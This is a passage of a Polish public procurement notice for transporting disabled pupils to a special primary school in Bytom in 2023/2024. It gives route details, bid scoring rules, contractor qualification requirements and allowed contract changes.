2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Ocena ofert zostanie dokonana wg następujących zasad:<br/>2.1. dla kryterium – cena (X1)<br/>Maksymalna ilość punktów do zdobycia w tym kryterium: 60 pkt<br/><br/> najniższa oferowana cena <br/> ilość pkt przyznana danej ofercie = ------------------------------------- x 60 pkt <br/> badana cena <br/> <br/>2.2. dla kryterium – rok produkcji samochodu (X2)<br/>1) Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę.<br/>2) W przypadku wskazania co najmniej dwóch takich samych pojazdów (nr rejestracyjnych) Zamawiający uzna to jako sprzeczność z treścią sw i oferta taka zostanie odrzucona. <br/>3) Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/> Punkty będą przyznawane w następujący sposób: <br/>rok produkcji: 2005 - 2007	- 0 pkt<br/>rok produkcji: 2008- 2010	- 5 pkt<br/>rok produkcji: 2011 - 2013	- 10 pkt<br/>rok produkcji: 2014 - 2016	- 15 pkt<br/>rok produkcji: 2017 - 2023	- 20 pkt<br/>4)	Zaoferowanie pojazdu wyprodukowanego przed 2005 r. Zamawiający uzna jako sprzeczność z treścią swz i oferta taka zostanie odrzucona. <br/>5)	W przypadku wskazania więcej niż jednego samochodu dla danej trasy punkty zostaną przyznane za najnowszy samochód (zostanie on wpisany do umowy).<br/><br/>2.3. dla kryterium – Czas podstawienia pojazdu zastępczego (X3)<br/>1)	Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego w podanym czasie od momentu zawiadomienia zgodnego z zapisami umowy, o okoliczności uzasadniającej konieczność podstawienia pojazdu zastępczego (np. awaria). Pojazd zastępczy musi spełniać wymagania Zamawiającego określone<br/>w specyfikacji warunków zamówienia i podane w ofercie wykonawcy.<br/>2)	Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/>3)	Punkty będą przyznawane w następujący sposób:<br/><br/>podstawienie pojazdu zastępczego do 20 minut - 20 pkt<br/>podstawienie pojazdu zastępczego od 21 do 30 minut	– 15 pkt<br/>podstawienie pojazdu zastępczego od 31 do 40 minut	– 10 pkt<br/>podstawienie pojazdu zastępczego od 41 do 50 minut	– 5 pkt<br/>podstawienie pojazdu zastępczego od 51 do 60 minut	- 0 pkt<br/><br/>4)	Zaoferowanie czasu podstawienia pojazdu zastępczego dłuższego niż 60 minut będzie niezgodne z treścią niniejszej specyfikacji i oferta będzie podlegała odrzuceniu. Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/><br/>3.	Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku<br/>4.	Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów.<br/>5.	W przypadku wystąpienia omyłek w złożonej ofercie (formularzu oferty), Zamawiający przyjmie za prawidłową cenę jednego wozokilometra. <br/>6.	Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona, jako X = X1 + X2 + X3. Oceny punktowe uzyskane dla poszczególnych tras, zostaną zsumowane i suma ta stanowić będzie końcowa ocenę badanej oferty.<br/>7.	Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>8.	Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert oraz sposobem ich oceny, określonym powyżej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji samochodu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów niepełnosprawnych wraz <br/>z oiekunem na zajęcia do Szkoły Podstawowej Specjalnej nr 40 w Bytomiu wraz z powrotem w roku szkolnym 2023/2024. Opiekuna zapewnia Zamawiający – zgodnie z opisem poszczególnych części/tras.<br/>2.	Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę. Środki transportu wykorzystywane do realizacji zamówienia nie mogą być wyprodukowane przed 2005 rokiem. Zaoferowanie do realizacji zamówienia pojazdów nowszych będzie oceniane w ramach kryteriów oceny ofert. W przypadku awarii środka transportu w trakcie realizacji zamówienia wykonawca zobowiązany będzie do podstawienia pojazdu zastępczego w czasie maksymalnie do 60 minut. Skrócenie czasu podstawienia pojazdu zastępczego będzie oceniane w ramach kryteriów oceny ofert.<br/><br/>3.	Zamówienie zostało podzielone na cztery części (trasy):<br/>Część (trasa) III - Bytom Śródmieście, Szkoła Podstawowa Specjalna nr 40,  Bytom Stroszek, (przystanek) Stroszek Zajezdnia Bytom  Bytom Stolarzowice, pl. Jana 13  Bytom Miechowice ul. Nowa 94a  Bytom Miechowice, Reptowska (przystanek)  Bytom ul. Matki Ewy 5b  Bytom Miechowice, ul. Francuska 64 (przystanek)  Drobczyka 13  Bytom Śródmieście, Szkoła Podstawowa Specjalna nr 40<br/>Powrót tą samą trasą po zakończeniu zajęć szkolnych. <br/>Maksymalnie: 66 km/dzień<br/>Ilość uczniów: 20 (na dzień opracowania opisu przedmiotu zamówienia) + opiekun – <br/>ZAPEWNIA ZAMAWIAJĄCY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Ocena ofert zostanie dokonana wg następujących zasad:<br/>2.1. dla kryterium – cena (X1)<br/>Maksymalna ilość punktów do zdobycia w tym kryterium: 60 pkt<br/><br/> najniższa oferowana cena <br/> ilość pkt przyznana danej ofercie = ------------------------------------- x 60 pkt <br/> badana cena <br/> <br/>2.2. dla kryterium – rok produkcji samochodu (X2)<br/>1) Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę.<br/>2) W przypadku wskazania co najmniej dwóch takich samych pojazdów (nr rejestracyjnych) Zamawiający uzna to jako sprzeczność z treścią sw i oferta taka zostanie odrzucona. <br/>3) Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/> Punkty będą przyznawane w następujący sposób: <br/>rok produkcji: 2005 - 2007	- 0 pkt<br/>rok produkcji: 2008- 2010	- 5 pkt<br/>rok produkcji: 2011 - 2013	- 10 pkt<br/>rok produkcji: 2014 - 2016	- 15 pkt<br/>rok produkcji: 2017 - 2023	- 20 pkt<br/>4)	Zaoferowanie pojazdu wyprodukowanego przed 2005 r. Zamawiający uzna jako sprzeczność z treścią swz i oferta taka zostanie odrzucona. <br/>5)	W przypadku wskazania więcej niż jednego samochodu dla danej trasy punkty zostaną przyznane za najnowszy samochód (zostanie on wpisany do umowy).<br/><br/>2.3. dla kryterium – Czas podstawienia pojazdu zastępczego (X3)<br/>1)	Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego w podanym czasie od momentu zawiadomienia zgodnego z zapisami umowy, o okoliczności uzasadniającej konieczność podstawienia pojazdu zastępczego (np. awaria). Pojazd zastępczy musi spełniać wymagania Zamawiającego określone<br/>w specyfikacji warunków zamówienia i podane w ofercie wykonawcy.<br/>2)	Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/>3)	Punkty będą przyznawane w następujący sposób:<br/><br/>podstawienie pojazdu zastępczego do 20 minut - 20 pkt<br/>podstawienie pojazdu zastępczego od 21 do 30 minut	– 15 pkt<br/>podstawienie pojazdu zastępczego od 31 do 40 minut	– 10 pkt<br/>podstawienie pojazdu zastępczego od 41 do 50 minut	– 5 pkt<br/>podstawienie pojazdu zastępczego od 51 do 60 minut	- 0 pkt<br/><br/>4)	Zaoferowanie czasu podstawienia pojazdu zastępczego dłuższego niż 60 minut będzie niezgodne z treścią niniejszej specyfikacji i oferta będzie podlegała odrzuceniu. Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/><br/>3.	Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku<br/>4.	Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów.<br/>5.	W przypadku wystąpienia omyłek w złożonej ofercie (formularzu oferty), Zamawiający przyjmie za prawidłową cenę jednego wozokilometra. <br/>6.	Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona, jako X = X1 + X2 + X3. Oceny punktowe uzyskane dla poszczególnych tras, zostaną zsumowane i suma ta stanowić będzie końcowa ocenę badanej oferty.<br/>7.	Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>8.	Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert oraz sposobem ich oceny, określonym powyżej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji samochodu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów niepełnosprawnych wraz <br/>z oiekunem na zajęcia do Szkoły Podstawowej Specjalnej nr 40 w Bytomiu wraz z powrotem w roku szkolnym 2023/2024. Opiekuna zapewnia Zamawiający – zgodnie z opisem poszczególnych części/tras.<br/>2.	Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę. Środki transportu wykorzystywane do realizacji zamówienia nie mogą być wyprodukowane przed 2005 rokiem. Zaoferowanie do realizacji zamówienia pojazdów nowszych będzie oceniane w ramach kryteriów oceny ofert. W przypadku awarii środka transportu w trakcie realizacji zamówienia wykonawca zobowiązany będzie do podstawienia pojazdu zastępczego w czasie maksymalnie do 60 minut. Skrócenie czasu podstawienia pojazdu zastępczego będzie oceniane w ramach kryteriów oceny ofert.<br/><br/>3.	Zamówienie zostało podzielone na cztery części (trasy):<br/>Część (trasa) IV - Bytom Śródmieście Szkoła Podstawowa Specjalna nr 40, Orląt lwowskich 12b Bytom, ul. Kilara 29 Bytom ul. Witczaka 4 Bytom <br/>ul. Brzezińska 9  Bytom Śródmieście, Szkoła Podstawowa Specjalna nr 40<br/>	Powrót tą samą trasą po zakończeniu zajęć szkolnych. <br/>Maksymalnie: 12 km/dzień<br/>Ilość uczniów: 19 (na dzień opracowania opisu przedmiotu zamówienia) + opiekun – <br/>ZAPEWNIA ZAMAWIAJĄCY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Ocena ofert zostanie dokonana wg następujących zasad:<br/>2.1. dla kryterium – cena (X1)<br/>Maksymalna ilość punktów do zdobycia w tym kryterium: 60 pkt<br/><br/> najniższa oferowana cena <br/> ilość pkt przyznana danej ofercie = ------------------------------------- x 60 pkt <br/> badana cena <br/> <br/>2.2. dla kryterium – rok produkcji samochodu (X2)<br/>1) Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę.<br/>2) W przypadku wskazania co najmniej dwóch takich samych pojazdów (nr rejestracyjnych) Zamawiający uzna to jako sprzeczność z treścią sw i oferta taka zostanie odrzucona. <br/>3) Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/> Punkty będą przyznawane w następujący sposób: <br/>rok produkcji: 2005 - 2007	- 0 pkt<br/>rok produkcji: 2008- 2010	- 5 pkt<br/>rok produkcji: 2011 - 2013	- 10 pkt<br/>rok produkcji: 2014 - 2016	- 15 pkt<br/>rok produkcji: 2017 - 2023	- 20 pkt<br/>4)	Zaoferowanie pojazdu wyprodukowanego przed 2005 r. Zamawiający uzna jako sprzeczność z treścią swz i oferta taka zostanie odrzucona. <br/>5)	W przypadku wskazania więcej niż jednego samochodu dla danej trasy punkty zostaną przyznane za najnowszy samochód (zostanie on wpisany do umowy).<br/><br/>2.3. dla kryterium – Czas podstawienia pojazdu zastępczego (X3)<br/>1)	Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego w podanym czasie od momentu zawiadomienia zgodnego z zapisami umowy, o okoliczności uzasadniającej konieczność podstawienia pojazdu zastępczego (np. awaria). Pojazd zastępczy musi spełniać wymagania Zamawiającego określone<br/>w specyfikacji warunków zamówienia i podane w ofercie wykonawcy.<br/>2)	Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/>3)	Punkty będą przyznawane w następujący sposób:<br/><br/>podstawienie pojazdu zastępczego do 20 minut - 20 pkt<br/>podstawienie pojazdu zastępczego od 21 do 30 minut	– 15 pkt<br/>podstawienie pojazdu zastępczego od 31 do 40 minut	– 10 pkt<br/>podstawienie pojazdu zastępczego od 41 do 50 minut	– 5 pkt<br/>podstawienie pojazdu zastępczego od 51 do 60 minut	- 0 pkt<br/><br/>4)	Zaoferowanie czasu podstawienia pojazdu zastępczego dłuższego niż 60 minut będzie niezgodne z treścią niniejszej specyfikacji i oferta będzie podlegała odrzuceniu. Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/><br/>3.	Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku<br/>4.	Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów.<br/>5.	W przypadku wystąpienia omyłek w złożonej ofercie (formularzu oferty), Zamawiający przyjmie za prawidłową cenę jednego wozokilometra. <br/>6.	Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona, jako X = X1 + X2 + X3. Oceny punktowe uzyskane dla poszczególnych tras, zostaną zsumowane i suma ta stanowić będzie końcowa ocenę badanej oferty.<br/>7.	Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>8.	Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert oraz sposobem ich oceny, określonym powyżej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji samochodu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/>Wykonawca winien posiadać:<br/>a)	licencję na wykonywanie krajowego transportu drogowego osób (nadaną <br/>w trybie przepisów ustawy z dnia 6 września 2001 r. o transporcie drogowym – t. j.: Dz. U. z 2022 r. poz. 2201) <br/> lub<br/>b) zezwolenie na wykonywanie zawodu przewoźnika drogowego (nadane w trybie przepisów ustawy z dnia 6 września 2001 r. o transporcie drogowym – t. j.: Dz. U. z 2022 r. poz.2201). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu.<br/>2.	Wykonawca zostanie wykluczony z postępowania, jeżeli zajdą okoliczności określone w art. 108 ust. 1 ustawy Pzp lub art. 7 ustawy z dnia 13 kwietnia 2022 r. <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego Dz. U. z 2023 r. poz. 129 ze zm.).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych w celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu, tj.:<br/>1) koncesji, zezwolenia, licencji lub dokumentu potwierdzającego, że wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych <br/>w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania – dotyczy wszystkich części;<br/>2. Zamawiający nie wezwie do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, <br/>o ile Wykonawca wskazał w oświadczeniu, o którym mowa w cz. IX SWZ, dane umożliwiające dostęp do tych środków. <br/>3.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania, w tym na etapie składania ofert podlegających negocjacjom lub niezwłocznie po ich złożeniu, wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych aktualnych na dzień ich złożenia.<br/>4.	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może <br/>w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Oferta winna składać się z:<br/>1)	formularza oferty (załącznik nr 1 do SWZ);<br/>2)	oświadczenia, o niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunków udziału w postępowaniu, o którym mowa w cz. IX SWZ (załącznik nr 3 do SWZ);<br/>3)	odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania – o ile ofertę składa osoba prowadząca działalność gospodarczą lub podmiot wpisany do ww. rejestrów <br/>oraz jeżeli dotyczy:<br/>4)	w przypadku składania oferty przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (konsorcjum) - oświadczenie, z którego winno wynikać, które usługi wykonają poszczególni wykonawcy (można skorzystać <br/>z druku określonego w załączniku nr 4 do SWZ);<br/>5)	pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentu, o którym mowa <br/>w ppkt 3); <br/>6)	dokumentu ustanawiającego pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>UWAGA: <br/>a) Wykonawca nie jest zobowiązany do złożenia dokumentu, o których mowa w ppkt 3), jeżeli Zamawiający może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów,<br/>b) postanowienie ppkt 5) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, <br/>c) postanowienie ppkt 3) i 5) oraz lit. a) stosuje się odpowiednio do osoby działającej <br/>w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (np. konsorcjum) oświadczenie, o którym mowa w pkt 1 składa każdy z Wykonawców, <br/>w którym każdy z Wykonawców potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3.	W przypadku polegania na zdolnościach podmiotów udostępniających zasoby, Wykonawca załącza do oferty również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> . Dopuszcza się zmiany umowy w zakresie, o którym mowa w art. 455 ust.1 pkt 2-4 i ust. 2 ustawy Prawo zamówień publicznych.<br/>3. Zgodnie z art. 455 ust 1 pkt 1 ustawy Prawo zamówień publicznych strony przewidują możliwość zmian umowy w następujących przypadkach:<br/>1)	zmiany wynagrodzenia Wykonawcy, (w tym cen jednostkowych) brutto, w przypadku zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zasady wprowadzenia zmian określają ust. 5 – 10.<br/>2) zmiana trasy i ilości km w przypadku wystąpienia okoliczności (niezależnych od stron umowy) wymagających jej dokonania, bez zmiany stawki jednostkowej,<br/>3) zmiany umowy w zakresie wskazanych podwykonawców, rezygnacji z podwykonawców, zmiany wskazanego zakresu podwykonawstwa, wykonania zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu o udzielenie zamówienia publicznego żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa.<br/>4) zmiany środka transportu w przypadku zwiększenia ilości dzieci objętych przewozem na danej trasie, która spowoduje brak możliwości dokonywania przewozu dotychczasowym pojazdem. Zmieniony środek transportu winien odpowiadać wymaganiom Zamawiającego opisanym w specyfikacji warunków zamówienia. Zamawiający dopuszcza zmianę stawki za wozokilometr maksymalnie do stawki obliczonej wg proporcji przewożonych osób (obliczonej wg reguły: dotychczasowa stawka podzielona na ilość osób przewożonych przed zmianą i pomnożona przez ilość osób po zmianie); <br/>5) zmiana pojazdów wykorzystywanych przy realizacji umowy w przypadku wprowadzenia nowszych pojazdów i spełniających wszystkie wymogi Zamawiającego opisane w specyfikacji warunków zamówienia oraz wskazanych w ofercie,<br/>6)	zmiany postanowień umowy, których konieczność wprowadzenia jest wynikiem zmian obowiązującego prawa bądź działań organów państwowych, samorządowych, sądowych lub administracyjnych,<br/>7)	wprowadzenia zmian nieistotnych, niezależnie od ich wartości, z zastrzeżeniem <br/>art. 454 ust. 2 